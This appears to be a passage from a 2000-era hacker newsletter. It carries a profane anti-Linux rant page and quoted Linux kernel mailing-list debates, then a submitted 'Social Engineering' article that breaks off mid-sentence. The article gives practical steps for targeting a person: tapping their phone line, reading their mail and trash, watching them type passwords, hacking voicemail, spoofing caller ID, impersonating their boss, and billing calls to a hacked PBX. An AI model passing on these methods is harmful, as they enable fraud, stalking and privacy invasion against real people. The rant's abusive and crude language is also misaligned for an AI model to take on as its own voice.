http://www.spatula.net/proc/linux/localhost.src) Miserably pathetic threading implementation doesn't scale for shit: all threads wake up on signals (stampeding process problem). L1nux c0d3rz! { 3y3 wr1t3 31337 c0d3! It's amazing how terminally clueless 31337 L1nux c0d3rz can be. Those of you who folllow Bugtraq, for example, have probably seen this bit of 31337 c0d3: #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ Apparently these kiddies slept that day when Big and Little Endian were explained in their high school architecture classes, and also that day in their college networks class (oh wait; they're not old enough to be in college) when htons was discussed in relation to network byte ordering. For you L1nux cl00b13z, you should always call htons(3) on integers you plan to stick in a network header. Htons has a platform-dependant implementation that guarantees a result in network byte order. The cl00b13 who wrote the above code not only wrote broken code, but also wrote code that, in effect, does absolutely nothing more than a simple call to htons(3). Harold Gutch said it best in a comment he inserted into the "nestea" exploit, as he corrected some stupid L1nux k1dd13 c0d3: (see http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-22&msg=19980427012153.18775@foobar.franken.de) /* bsd usage works now, the original nestea.c was broken, because some braindead * linsux-c0d3r was too stupid to use sendto() correctly */ } LILO can't cope with kernels > 1Mb, so the kernel has to be gzipped. strfry and memfrob Can't cope with hard drives > 32GB GPL - a license and a virus Fundamental design and direction problems. It turns out that Linus is not the smartest man in the world and the saviour of all mankind. (see #fundamental at end of article) OS or religion? UNABLE TO LOAD INTERPRETER...memory leak much? This is a real Linux error message: Uhhh. NMI recieved. Dazed and Confused. Trying to cope ...such professionalism! The GNU su manpage actually says this: (see http://www.freebsd.org/cgi/man.cgi?query=su&apropos=0&sektion=0&manpath=Linux+Slackware+3.1&format=html) This program does not support a "wheel group" that restricts who can su to super-user accounts, because that can help fascist system administrators hold unwarranted power over other users. ...apparently it's better for any user to attack the root password than to offer added security. Ignorance of security is a common Linux thread. vi != vi; vi == vim. vim links to X libraries. Wipe X, and now you can't use vi. Retards. Still no USB support in 2000, after NetBSD and FreeBSD have had it for nearly 2 years. So much for the "million geeks" theory of rapid software development. I don't expect this list to be up to date; Linux is impossible enough to keep up with as a user, and it's even harder to keep up with how broken and lame it is this week. In general, the further something is down the list, the newer the information is. It's almost surprising how much of the older items still hold true today, until you consider the fragmented and undirected development effort. Before you wet the briefs your mommy bought for you at Target and frantically search for a link to email me something about how "it's not like that anymore" or "how dare you insult Linux! I will h4x0r you!" or other such standard Linux sycophant drivel, consider for a moment that I just don't give a fuck what you have to say. I understand that it can be upsetting to you to see your precious OS exposed as the garbage it is. I've heard it all before, so you can save your energy for something more complex and important to you, like learning how to masturbate. (you know, like see : http://www.jackinworld.com) Perhaps the greatest crime of Linux is the production of nonportable code. The Linux c0d3rz wave the free-software flag, but they're just as bad as Microsoft in making software that can run only under their OS. Check out my favorite Linux joke. (http://www.spatula.net/proc/linux/linux.joke.src) Also read aard's linux joke "once upon a time there was this guy who wanted to bring his products to the internet for sale. so he investigated e-commerce, and scalability, robustness, and synergy. and he decided to run linux." -=- News Articles, Interviews, etc Throughout all of these, it's interesting to note the typical Linux kiddie reaction to proof that their OS sucks ass. It's always something like: 1.The test wasn't "fair" 2.What about new kernel x.y.z? 3.You can't expect 4.The people doing the test must be mean/biased 5.It wasn't tuned properly 6.They didn't look at the latest release of Red Hat x.y! They really seem like 4-year-olds who have just been denied a pack of gum in a grocery store. Linux reviews are bought- not earned (http://news.tucows.com/linux/linux07072000.html) Bad Linux Advocacy FAQ - a must-read (http://www.softpanorama.org/OSS/bad_linux_advocacy_faq.shtml) Sendmail developers have discovered a big gaping hole present in ALL linux kernels up to and including 2.2.15. (http://sendmail.net/?feed=000607linuxbug) Security Focus statistics page. Note how only Windows NT has had more security problems than Linux. (http://www.securityfocus.com/vdb/stats.html) Linux loses Wall Street's interest... fancy that: Linux, it turns out, is not the greatest thing ever (http://dailynews.yahoo.com/h/zd/20000526/tc/linux_losing_its_buzz_on_wall_street_1.html) Another Wall Street story of Linux firms merging, hoping to actually turn a profit. Wow! (http://dailynews.yahoo.com/h/cn/20000524/tc/linux_sellers_merge_eye_profitability_1.html) Linux is not mature enough for high-end computing (http://dailynews.yahoo.com/h/cn/20000517/tc/commentary_market_not_ready_for_high-end_linux_systems_1.html) Linuxcare go spaf! (http://dailynews.yahoo.com/htx/zd/20000522/tc/can_linuxcare_stay_afloat__1.html) This is hella funny (http://www.overclocked.org/OCwhinux.htm) Alan Cox is to blame for the big gaping hole, and didn't even catch the most foolish and common of CGI mistakes. Alan Cox is one of the lead Linux kernel coders. (http://slashdot.org/comments.pl?sid=00%2F04%2F25%2F037238&cid=121&pid=0&threshold=5&mode=flat&commentsort=0#121) Big gaping hole in Red Hat security. Fat fucking surprise! (http://www.msnbc.com/news/399125.asp) Linux is marketing and hype according to this Wall Stree Journal article (http://dowjones.wsj.com/n/SB936961814325017645-d-main-c1.html) Linux is marketing and religion according to this ZDnet article (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2_) Interview with Keith Bostic including the quote "Linux and Microsoft both started from scratch, and it showed." (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2) ZDnet article about Linux fragmentation (http://www.zdnet.com/zdnn/stories/news/0,4586,2470425,00.html) Debugging is hard! let's go shopping! (http://dailynews.yahoo.com/htx/cn/20000315/tc/20000315168.html) Dorks. (http://biz.yahoo.com/bw/000313/ma_andover_1.html) The thrill is gone for Linux (http://www.zdnet.com/zdnn/stories/news/0,4586,2458906,00.html) Don't invest in Linux! (http://dailynews.yahoo.com/h/cn/20000229/tc/20000229058.html) Even the SuSe CEO says that Linux is poo (http://www.cnn.com/2000/TECH/computing/03/02/no.linux.desktop.idg/index.html) SCOWorld article that says, in part: . In our tests of these operating systems, all but one of the Linux systems suffered two or more crashes during the testing period. The FreeBSD system and both SCO operating systems suffered no crashes at all. (http://www.scoworld.com/jf00rdup.html) Computerworld: three UNIX systems better than Linux (http://www.computerworld.com/home/print.nsf/All/000207E972?OpenDocument&~f) PC Week article about how Linux is overexaggerated (http://www.zdnet.com/filters/printerfriendly/0,6061,372462-54,00.html) Computerworld interview with SCO's CEO calling Linux a religion. (http://www.computerworld.com/home/print.nsf/all/990426A08E) ZDnet article about Linux Security- and how badly it sucks ass. (http://www.zdnet.com/zdnn/stories/news/0,4586,2430772,00.html) Linux is Obsolete - a series of well-circulated Usenet postings in a thread started by Andy Tanenbaum, a respected Operating Systems authority. Note how Tanenbaum presents himself vs Linus having a tantrum. (http://www.educ.umu.se/~bjorn/mhonarc-files/obsolete/maillist.html) ZDnet article about the recent (2/14/00) Denial of Service attacks which says, in part: "The three DDoS tools in wide distribution on the Internet rely on known security vulnerabilities of Solaris and Linux." so you can thank Linux for the last wave of Denial of Service attacks. (http://www.zdnet.com/pcweek/stories/news/0,4153,2436770,00.html) JWZ's article about how linux is only free if your time has no value. For those that don't know, JWZ is a very clever guy who was deeply involved in the development of Netscape & Mozilla for some time (http://www.jwz.org/doc/linux.html) ZDnet review of linux as a web server, including mention of how the tcp/ip stack is broken in the 2.2 kernel, which is a perfect example of the mention above about new kernels breaking applications. (http://www.zdnet.com/devhead/stories/articles/0,4413,2258790,00.html) Linux: poo FreeBSD: good (http://www.idg.net/go.cgi?id=161881) (HWA runs bsd...lol - Ed) The Linux Myth - John Dvorak on ZDnet (http://www.zdnet.com/zdnn/stories/comment/0,5859,2338326,00.html) Daemon News article outlining many of the misconceptions than Linsux weenies spread about BSD. (http://www.daemonnews.org/199909/freebsd.html) (Read this too - Ed) Web server comparison showing that Linux is still slower than FreeBSD (http://perl.pattern.net/bench/) Byte Magazine article outlining how "Linux is only free if your time has no value" (http://www.byte.com/columns/Be_view/1999/06/0607Be_view.html) NT Magazine outlines many Linux shortcomings (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=5048) Another NT Magazine article (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=4502) Mindcraft says that FreeBSD outperforms Linux in this article defending their benchmarks (http://www.mindcraft.com/whitepapers/rebut-abcnews.html) Read what Ken Thompson has to say about Linux (http://www.spatula.net/proc/linux/thompson.src) FreeBSD is faster than Linux (http://www.it.fairfax.com.au/990316/openline1.html) NT is faster than Linux (http://www.mindcraft.com/whitepapers/nts4rhlinux.html) A news.com article discussing Linux shortcomings (http://news.com/News/Item/0,4,34918,00.html) Here's a zdnet article that details why Linux's time is over. (http://www.zdnet.com/zdnn/content/pcwk/1521/317585.html) NT is better than Linux (http://www.zdnet.com/pcweek/stories/columns/0,4351,377260,00.html) The anti-linux crusade (http://abcnews.go.com/sections/tech/FredMoody/moody981120.html) thanks to: urg, aard, brightmn, imperial, ee, foo, JB, cykyc Sun Jul 30 04:31:48 EDT 2000 linux/index.src Updated: Fri Jul 21 2000 1:13.15 Viewed: never Copyright © 1998-1999 by Nick Johnson. All rights reserved. #breakage From http://kt.linuxcare.com/latest.epl of 2/3/2000, here is an example of the Linux API changing and generally fucking over those who develop commercial software for it. Block Device Interface Change And Related Pain 2000/01/07 - 2000/01/11 (52 posts): [ANNOUNCE] block device interfaces changes Alexander Viro announced that the block device interface would be changing, and that some of these changes had made it into 2.3.38; he listed: 1.New type (struct block_device) is defined. We have a cache of such objects, indexed by dev_t. struct block_device * is going to replace kdev_t for block devices. Handling of the cache is done in fs/block_dev.c 2.They have methods (struct block_device_operations). Currently the set is { open, release, ioctl, revalidate, check_media_change }. For now (and it's going to change) types are the same as in file_operations. However, in the near future they are going to become int (*open)(struct block_device *bdev, mode_t mode, unsigned flags); int (*release)(struct block_device *bdev); int (*ioctl)(struct block_device *bdev, unsigned cmd, unsigned long arg); int (*revalidate)(struct block_device *bdev); int (*check_media_change)(struct block_device *bdev); 3.->revalidate() and ->check_media_change() disappeared from file_operations. 4.register_blkdev() takes block_device_operations instead of file_operations now. For one thing, it means that block devices are more or less insulated from all future changes in file_operations (Good Thing(tm)). For another, it means that drivers should be modified. I did the change for all drivers in the main tree, see the patch for details. It's pretty easy. 5.blkdev_open() doesn't change ->f_op. def_blk_fops has all needed methods (open, release and ioctl call the methods from block_device_operations, indeed). 6.Inodes got a new field: i_bdev. Filesystems should not worry about it - just remember to call init_special_inode() when you are initializing device/fifo/socket in-core inode (in foo_read_inode() or in foo_mknod(); all filesystems in the tree are doing it now). Contents of this field: pointer to struct block_device if it is a block device inode, NULL otherwise. 7.Superblocks got a new field: s_bdev. Handled by code in fs/super.c, points to the struct block_device if the mount is device-backed, NULL otherwise (i.e. for NFS, CODA, procfs, etc.). 8.do_mount() first argument is struct block_device * now. It does the right thing for non-device mounts - just pass NULL and it will work (allocate the anonymous device, etc.) 9.Instead of calling get_blkfops(), use ->bd_op in struct block_device. Moreover, better use blkdev_get()/blkdev_put()/ioctl_by_bdev() (see examples in mm/swapfile.c, drivers/char/raw.c, fs/super.c, fs/isofs/inode.c, fs/udf/lowlevel.c). 10.Thing that is probably going to happen RSN: instead of struct gendisk per major we may want to go for struct gendisk per _disk_. It would mean that at some point near ->open() we will put the pointer to it into the struct block_device. One obvious consequence being that partitions-related ioctls() will become completely generic. Notice that it is _not_ the same as devfs (and not a beginning of moving devfs into the main tree). It just provides the backplane - no namespace, no nothing. Inodes (either in normal filesystems or in devfs) point to such animals. That's it. Eventually things like ->b_dev, ->b_rdev, ->i_dev, ->rq_dev, etc. are going to become pointers to such objects, but it will be done step-by-step - otherwise we'll end up with a moby patch and moby breakage in bargain... Character devices are not affected at all - IMO using the same type both for block and character device was a mistake. So their handling remains as-is. Probably something should be done for them too, but that's completely different story. Richard B. Johnson picked himself up off the floor and said: Good grief Charley Brown! You, in a few key-strokes, just blew away major portions of the work done over the past few years by software engineers who ported their drivers to Linux. Linux will never be accepted as a 'professional' operating system if this continues. It's enough of a problem putting one's job on-the-line convincing management to risk new product development to Linux. Once these products are in Production, and bugs are discovered in the OS, we must be able to get the latest version of the OS and have our drivers compile. If this is not possible, you do not have an operating system that is anything other than an interesting experiment. For instance, there was a simple new change in the type of an object passed to poll and friends. This just cost me two weeks of unpaid work! Unpaid because I had to hide it. If anyone in Production Engineering had learned about this, the stuff would have been thrown out, the MicroCreeps would have settled in with "I told you so..", and at least three of us would have lost our jobs. Industry is at war. You can't do this stuff to the only weapons we have. Once you claim to have a "Professional Operating System", its development must be handled in a professional way. If major kernel interface components continue to change, Linux is in a heap of trouble as are most all of those who are trying to incorporate it into new designs. The industrial use of Linux is not at the desktop. It involves writing drivers for obscure things like machine controllers (read telescope controllers), Digital signal processors (read medical imaging processors), and other stuff you can't buy at the computer store. It doesn't matter if you fix all of Donald Becker's drivers to interface with the new kernel internals. You have still broken most everything that counts. There were a number of replies to this. Alexander found Richard's post clueless and Monty-Pythonesque. On a serious (though annoyed) note, he explained, "one of the worst things about block drivers-to-kernel interface is that they share it with files. I.e. _any_ change in file_operations or in struct file or in struct inode and you are deep in it. Change the size of any field prior to ->i_dev and you are in for recompile. Change device number bitness and even recompile may be of little help. Removing those dependencies (not all of them are removed yet, more will follow) is going to save _your_ ass a year later." Also replying to Richard, Victor Khimenko said, "Drivers MUST be changed with new kernel release (and thus via development branch: development kernels are just snapshots of development process after all). It was true from the start and it'll be true tomorrow. It's true for most OSes available. It's ESPECIALLY true for Linux where drivers are linked directly in kernel. If you expected something other then you made wrong choice choosing Linux." Gregory Maxwell said to Richard: We all know your position on compability. :) Many people, including myself, usually understand and agree with it. However, you are going a little far on this one. The change is going into 2.3.x, and that *IS* the approiate place to break interfaces. These kinds of changes should certantly not be introduced into 2.2.x. This should cause you little difficulity, as your example of having to upgrade to fix a bug should not apply. When you upgade to fix a bug then you should just be increasing patchlevel. If there is not a patch for a bug in 2.2.x which is fixed in 2.4.x then there is a bug in the Linux development process. In order to move forward, we *must* break things. To make up for this we continue to maintain old versions. There are still bugfixes being made against 2.0.x and there will be bugfixes against 2.2.x. RedHat even still issues updates against RH4.2.. So if this were to have occured within a stable kernel version, or if it had severly affected userspace, I would agree. Rik van Riel put it this way to Richard: Industrial use of Linux usually doesn't involve the kernels which are marked as `development', ie. where the `middle' version number is odd and where major things are expected to change. People venturing out on that terrain can know what they're heading into (see http://kt.linuxcare.com/) and shouldn't come whining when some actual development happens in the development branch of the kernel. The should only whine when development stops, not when useful changes are taking place... But David Parsons objected to Rik, "Except, of course, that when the changes go in they are never backed out so the interfaces remain stable for the production kernels. That's the *really* annoying thing about this line of argument; when else should someone complain that an interface has been turned into gravel? If you wait until the development tree has become a production tree, enough code will be modified to work with the New! And! Improved! interfaces that your complaints (cf: old-style fcntl locking) will be dismissed sight unseen by the Core Team." He added, "The big support providers are the ones who benefit from interface churning. It's the small shops that get bitten in the ass because they don't have enough money to buy programmers or enough time to do the patches." There was no reply to this. Alan also replied to Richard with the quote of the day, saying, "Linux isnt at war. War involves large numbers of people making losing decisions that harm each other in a vain attempt to lose last. Linux is about winning." At some point, Richard posted again, having received many private emails in addition to the slew on the list. He said: I have gotten a lot of mail on this so I will reply only once. Many of the professional industrial uses of Unix were previously covered using Sun boards, boxes and SunOs. If you ever dial 10 before a long-distance number to get a cheaper rate, that's voice over IP and we make that stuff. This was developed on Suns, runs on them, but will soon be running on cheap Intel clones. If you ever have to go to the hospital and have a CAT-Scan or a MRI, you are using equipment developed by us, even though the name on the box may be Phillips, General Electric, Toshiba, or various other companies. You can look http://www.analogic.com and see what we do for a living here. The Sun driver interface has been constant. Unfortunately, you have to install it, meaning link it and reboot. When Installing a system, meaning the complete software package, the end-user's technician installs the OS from a CDROM. Then the application with its drivers are installed from another CDROM. This works on Suns and has been the De-facto standard way of doing things. Linux was not suitable for the applications running on Suns until Linux provided the installable device driver. The ability to install a hardware-interface module into a kernel was my main selling point for using Linux to replace SunOs, and, indeed the whole Sun architecture. Incidentally, the cost is the same. A CDROM for Solaris is essentially the same cost as a CDROM for Linux. Once you start distributing an operating system and supporting the distributors, a "free" operating system is no longer free. By the time a decision was made to produce our new Exact Baggage Scanner, marketed by Lockheed-Martin, engineering management was dragging its feet on the use of Linux. They wanted something that was "everything to everybody", but didn't want the cost of using Suns. Further, it had to be completely under company control. I was unable to convince anybody to use Linux so I had to write my own Operating System. It is called ARTOS (Analogic Realtime Operating System). Our Sky Computer Division, which produces the world's fastest (still) digital signal processor, made the high-speed stuff, a lowly Intel Pentium with my OS is used as the system controller, and an Alpha Workstation is used for the user interface. When this was completed, we went on to producing our third generation CAT Scanner. This uses a Pentium as the main system controller and Linux as the operating system. The User Interface uses Windows-NT. It was felt that Linux was sufficiently well-hidden in the bowels of the machine so nobody would care. The drivers in this machine comprise both block and character devices. One of major building blocks is the driver that interfaces to the Digital Signal Processor. This DSP board comprises up to 32 TMS-320C20 DSPs plus an i960 for interface. It is made by our CDA Division. Completed data, available within a 32k window, a 512x512x16bit chunk, must be transferred to the User Interface within 1/4 second to make the specification. It does. Now, our legal department has defined the criteria we must meet to use Linux. They presume that we will provide a "current distribution" of Linux to every end-user. They also defined that, since drivers may be deemed to modify the operating system, we have to provide driver source-code to the customer if they request it. Application code continues to be proprietary. Changing the kernel interface to drivers is counter productive. In fact it makes the usual field installation impossible. The usual installation would automatically and transparently compile the interface modules, using the new Operating System. This is no longer possible because the compilation will fail. Again, if Linux is to become other than an interesting experiment, one cannot change these interfaces without understanding the whole picture. Distributors don't care. The more changes there are, the greater the obsolescence, the more money they make selling new boxes of CDROMs. Therefore there is no controlling negative feedback to be obtained from the distribution channel. You can reject what I say out-of-hand, and continue as an experiment, or you can listen and make a significant contribution to providing jobs worldwide. It is, of course, possible to fragment Linux. A company could be started, called StableLinux that distributes only Linux n.n.n and performs bug-fixes and maintenance on that version only. This is not helpful to the greater Linux community. Instead, we need to minimize the changes that affect the interfaces to world-wide applications. Just as POSIX attempted to stabilize the API so that one could write "portable" code, the interface to hardware that hasn't even been invented yet has to be stable. Chris Adams and Horst von Brand suggested that "current distribution" refered to even-numbered minor version numbers only. Horst expanded, "OK, "current distribution" means 2.2.x kernel today, and was 2.0 sometime back. It will be 2.4 in a few months time, and perhaps 2.6 in a year and a half. You are supposed to distribute the machine and source to drivers &c _when shipped_, I'd assume. Check the code, test it to breaking *and keep it*. Ship that to customers, and either offer upgrades to 2.4 if needed for some reason, or stay put." Elsewhere, replying to Richard's original post, Jamie Lokier said, "If you need a stable API, you chose the wrong operating system. It's no secret that Linux APIs change. You can't blame the kernel developers for doing exactly what they said they will do. If you want, you can blame the people who incorrectly assumed the APIs would stay the same, for not investigating the obvious." And Ted added, "If you told your management that Linux kernel interfaces never change across versions, then you were sadly mistaken. However, the mistake is on your end, I'm afraid." To this, Richard replied: No. According to our Legal Department, to satisfy the GPL requirement that we provide source to the end-user, they required that we supply a "current" distribution of Linux if the end-user requests it. This seemed, by them, to be an easy solution to possible problems. Unfortunately, for Engineering, this means that we have to keep everything "current" during development so that, by the time equipment is shipped, it will run with the "current" distribution (whatever this is). The obvious solution, given these constraints, is that we just ignore all changes until shipping time, then attempt to compile with the latest distribution, fixing all the problems at once. However, we then end up shipping untested software which ends up being another problem. Checking to see if it "runs" isn't testing software in the cold cruel world of industry. So, presently, I have 13 drivers I have to keep "current". Yesterday they all got broken again. A week before, half of them were broken because somebody didn't like a variable name! That said, a major problem with changes that I see, is that the changes are made without the notion of a terminating condition. For instance, new parameters are being passed to existing interface functions. If you are going to break an interface, you should plan on only breaking it once rather than opening the door for more changes and leaving it open. For instance, once you have to pass more than (depends upon the machine) about 3 parameters, it's best to put them all in a parameter- list (structure) and pass only the address of the parameter list (pointer). From that time on, you only have to add structure members to the parameter list if you have to add changes. If I had seen these kinds of changes I would not have complained. It means I have to rework stuff only once. So `read(f,.......)` should have been changed to `read(params *)` and you are done with it forever as long as you don't change structure member names and functions for kicks. This time it was Alexander's turn to pick himself up off the floor; and in response to the first paragraph of Richard's post, said, "Oh. My. God. They are requiring you to do WHAT??? Do you mean that you really ship 2.3.x to your customers? Arrggh. "Source" == "source of what we are shipping". And not "anything that was written by other guys who started from the same source". It's utter nonsense. _No_ license can oblige you to include the modifications done by somebody else. Otherwise you'ld have those drivers in the main tree, BTW - _that_ much should be clear even for your LD." But David Lang put in, "he is not saying that he has to ship a 2.3 kernel, he is reacting to the fact that he will have to ship a 2.4 kernel. the blame for this lies squarly on the legal department who decided that they had to ship a "current" disto. There is some semblance of reason for this as they want to try and limit the support costs by not using "obsolete" versions, but given the way many of the major distros patch the kernel before shipping it you still may have problems. The answer is to figure out some way to educate the legal department to allow for a more gradual change." #fundamental Taken from http://kt.linuxcare.com/latest.epl on 2/3/2000, this is just one example of serious design problems with Linux, and serious questions about its present and future direction, considering the plans laid out by its creator. Apparently speed and efficiency aren't as important to Linus as having a pretty filesystemish interface. Hope you didn't want to do anything useful with your CPU in userspace... /proc And sysctl() 2000/01/06 - 2000/01/12 (43 posts): /proc guidelines and sysctl Benjamin Reed wrote a wireless ethernet driver that used /proc as its interface. But he was a little uncomfortable defining his own namespace under /proc, and asked if there were any conventions he should follow. He added, "And finally, what's up with sysctl? Are driver writers recommended to use that over extending /proc or is it deprecated? Again guide lines would be nice." Linus replied with: The thing to do is to create a /proc/drivers// directory. The /proc/drivers/ directory is already there, so you'd basically do something like create_proc_info_entry("driver/mydriver/status", 0, NULL, mydriver_status_read); to create a "status" file (etc etc). For the sysctl question, he added, "sysctl is deprecated. It's useful in one way only: it has some nice functions that can be used to add a block of /proc names. However, it has other downsides (allocating silly numbers etc - there should be no need for that, considering that the /proc namespace is alreayd a perfectly good namespace)." Marcin Dalecki flamed Linus: Are you just blind to the neverending format/compatiblity/parsing/performance problems the whole idea behing /proc induces inherently? Oh yes they don't turn up that frequently anylonger, since everybody learned in the time between don't touching anything there like a heap of shit. Instead of changing something, one leaves the broken /proc interface where it is and adds just another new file (or even dir) there. My favorite examples for how broken they are /proc/stat the information there is entierly *broken* misleading and incomplete. (leftover from early days.) /proc/pci static data continuously reconstructed on the fly. (binary to string and then back string to binray in userland...) And now (2.3.xx) it's event binary only... /proc/cpuinfo same here static data. uname is since the beginnging the proper interface for this stuff. /proc/ksyms entierly redundant and not used by the modutils. /proc/modules entierly redundant to the module syscalls. *Not* used by lsmod. /proc/version entierly static data with no apparent value /proc/kmsg entierly redundant to syslog. One could continue with no end... root:/proc# cat meminfo total: used: free: shared: buffers: cached: Mem: 64577536 62787584 1789952 20643840 1339392 17186816 Swap: 139821056 36478976 103342080 MemTotal: 63064 kB MemFree: 1748 kB MemShared: 20160 kB Buffers: 1308 kB Cached: 16784 kB SwapTotal: 136544 kB SwapFree: 100920 kB Wonderfull!!!! The same data twice, albeit no one of them easly parsed! Easly parsed? By what? AWK? SED? or should the procps utilities beeing implemented in damn PERL? (Some loosers who don't know C would apreciate this, certainly) !!!!! The only thing I'm missing is adding floating point formats to this... And then there is the phenomenon of proliferation of /proc items. Just an example... root:/proc/ide# find /proc/ide /proc/ide /proc/ide/drivers /proc/ide/hdd /proc/ide/ide1 /proc/ide/ide1/hdd /proc/ide/ide1/hdd/capacity /proc/ide/ide1/hdd/settings /proc/ide/ide1/hdd/model /proc/ide/ide1/hdd/media /proc/ide/ide1/hdd/identify /proc/ide/ide1/hdd/driver /proc/ide/ide1/model /proc/ide/ide1/mate /proc/ide/ide1/config /proc/ide/ide1/channel /proc/ide/hda /proc/ide/ide0 /proc/ide/ide0/hda /proc/ide/ide0/hda/smart_thresholds /proc/ide/ide0/hda/smart_values /proc/ide/ide0/hda/geometry /proc/ide/ide0/hda/cache /proc/ide/ide0/hda/capacity /proc/ide/ide0/hda/settings /proc/ide/ide0/hda/model /proc/ide/ide0/hda/media /proc/ide/ide0/hda/identify /proc/ide/ide0/hda/driver /proc/ide/ide0/model /proc/ide/ide0/mate /proc/ide/ide0/config /proc/ide/ide0/channel Hell only God know's what they are good for! And there is no userland tool for this. This is the last thing Mark Lord added before ditching ide developement. root:/proc/sys# find /proc/sys | wc 208 208 7305 Don't tell me any sane admit will fiddle with ALL this... And in esp. any sane system doesn't need this degree of pseudo configuration flexibility. And here my ABSOLUTE FAVORITE: PID USER PRI NI SIZE RSS SHARE STAT LIB %CPU %MEM TIME COMMAND 21821 root 19 0 1032 1032 816 R 0 4.7 1.6 0:00 top * *** ***** ******* ********* *** *** *** *** *** *** Yes reading files, walking dirtrees and parsig them is indeed very very time consuming. I would like to know how well this design will scale to an enterprise server with 32 CPU and X*10000 concurrent processes: user:~/mysweethome: Message from root@localhost to user@localhost resived... BLAH BLAH: "Please stop any intensive intermittient computational activity. Due to maintainance work I'm going to run ps auxw int 5 minutes. Thank's in advance for your understanding! You's sincerly: root@localhost" Oh don't tell me procps could have been done better, there where years of time for this and apparently nobody managed to get it right for practical reaons.. I think you don't write enough user-land code... (just a guess) go and just compare for example the ps/netstat utlities from *BSD just too see WHY /proc as it is, is a BAD design :-). Maybe it appears cute as an idea to have something like this, but in practice something like this is inevitable going to result in a coding mess in esp. in an such uncoordinated effort like Linux. And I didn't even tell a word about the bloat/mess/races inside the kernel code caused by this all... Really man sysctl *is* much much saner and what should be "depricated" is /proc There was a bit of discussion, but Linus did not reply. Alexander Viro replied to Linus' statement that sysctl was deprecated. He burst out with: Oh, please! All we need is sysctlbyname(2) - _not_ a problem, and closes all problems with numbers. And it should not work through mounted procfs - we can traverse the tree doing comparisons by name just fine. The fact that sysctl(8) needs mounted procfs is an artificial misfeature, nothing more. What _is_ bogus is the idea of sysctl() doing more than read/write access to constant-sized variables. Or procfs entries doing ioctl(), for that matter - just look at /proc/mtrr, for one specimen. sysctl() is a perfectly reasonable subset of pseudofs-type stuff, with well-defined semantics (unlike the rest ;-/). The rest is pretty much a maze of twisted little formats, none alike. IMO dissolving the thing is _not_ a good idea. You have the final word, indeed, but I think that sysctlbyname() may remove most of the problems. Linus replied that he'd accept a patch to turn sysctl into a proc-only thing. He added, "The current problem is that sysclt tries to be more than proc, and has its own name-space etc. Not worth it." Andi Kleen proposed, "The nice thing of giving up the sysctl numbers is that it would be possible to use some ELF section based scheme for declaring sysctl variables in nice wrapper macros. You could get a sysctl variable with a single declaration. This would make them a lot more easy. Would you accept a patch for that?" Linus replied, "Show me the patch, and I can consider it. It would certainly be nicer than what it is now (the include/linux/sysctl.h file is EVIL, and a perfect example of the kind of idiotic brokenness we used to have in /proc before it was cleaned up)." Theodore Y. Ts'o also replied to Alexander, saying, "I actually like the original sysctl() design --- including the use of reserved numbers. After all, we have system calls, and we don't try to look up system calls when we executed them by name..... why is this OK for system calls, but not OK for sysctl()?" Linus replied: Because system calls are performance-sensitive. And system calls are not clearly "hierarchical". And system calls are supposed to be there regardless of what software and hardware configuration we have there. In contrast, sysctl isn't all that performance-sensitive, AND they are extremely hierarchical, AND they depend on configuration and timing. In short, sysctl NEEDS: "naming": you cannot name the sysctl space with a number: it is much too dynamic for that. How do you enumerate drivers? Give them random numbers? "listing": showing which sysctl's are there, in a hierarchical manner. Again, a listing is useless with a number. "hierarchy". You have different devices, but they have the same controls. Do they get the same name? Yes. But in different places in the hierarchy. In short, you NEED a filesystem. You need to be able to "ls" the thing. You need to be able to search the thing. You need to be doing all the things you can do with a real filesystem. And flattening it out and trying to number it does not work. Never has, never will. It's not an enumerated space. Sun Jul 30 04:40:22 EDT 2000 linux/stupidity.src Updated: Fri Jul 21 2000 1:13.15 Copyright © 1998-1999 by Nick Johnson. All rights reserved. @HWA 313.0 [IND] Article submission on 'Social Engineering' by tekneke ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Social Engineering by Tekneke Introduction: The purpose of this text is to introduce or better explain the art of social engineering. This is one of the most difficult things to explain but I found a rather easy method of doing it until you perfect your skills. Cross Analyzation: To begin social engineering you must know how to cross-analyze someone. Cross Analyzation is basically determining someone's personality by looking at them. This can be farely easy because people make the way they live so obvious to others. For example, how would you determine someone as being a homeless drunk? Well by their clothes, hygeine, smell, a bottle of alcohol in their hand, etc. Another way cross analyzation can be used is over the phone but this method is not reliable in some cases. But it is a very useful tool when social engineering. Look for things such as their tone of voice, the way they answer the phone, mumbling, stuttering, etc. You can also see how dumb someone is if you tell them that they won a sweepstakes and you want to collect some information about them and they dont hang up on you. Information Gathering: Information Gathering these days is very easy for example if you wanted to find out the phone # your next door neighbor simply log onto the internet and goto portal.cyberarmy.com and you just type in what you know whether it be the phone number, address, or full name. Another method would be by snooping through their mail and trash. The best method (in my opinion) is to run a tap on their line. This way you can use what you heard to make a better cross-analyzation and you might gain some valuable information such as usernames and passwords, (which could doubtfully be obtained by social engineering or you wouldnt be reading this)and maybe you'll even be able to get some dirt on them. Another method would be to get the old binoculars and watch as they enter passwords for e-mail on their computer or as they chat with people. Another method I have used in the passed is hacking their voice mail box or answering machine. Now if you do all of this you will have a shit load of information on them. Now to get to the engineering. Getting Prepared: Before calling your victim you might want to get a caller id spoofer or go box someone else's line. Another useful tool is a voice changer. Now if you do use a voice changer make it sound like you are a woman because most men will listen and believe what women tell them more then men. You might also want to see what kind of counter measures they have by snooping around the building or office that is your target. If its just someone's house then you can assume that they have caller id and some have anonymous call rejection. You might also want to route your call through a pbx if you have access to one. That way if you call out of area its billed on them. Another tip would be to call your target up to see what you have to say or do to get the information you want from a person. for example, if you were trying to get an operator to tell you the number you are dialing from you might want to immatate a telco guy and say you are calling from a trunk (which might work). You might also wanna find out about that person's boss so that you could immatate him/her. This is a very good idea if you can immatate their of voice and their slang. And if they give you some shit just give them shit back and say you're gonna fire them!!! Social Engineering: Now its time to put all that effort to work. This should actually be the easiest part if you successfully completed the other stuff. But if not you are gonna have to do some serious bullshitting. You might wanna reherse what you are gonna say as best as you can but you must expect the unexpected. If the target is on a PBX then hack into an account (such as the 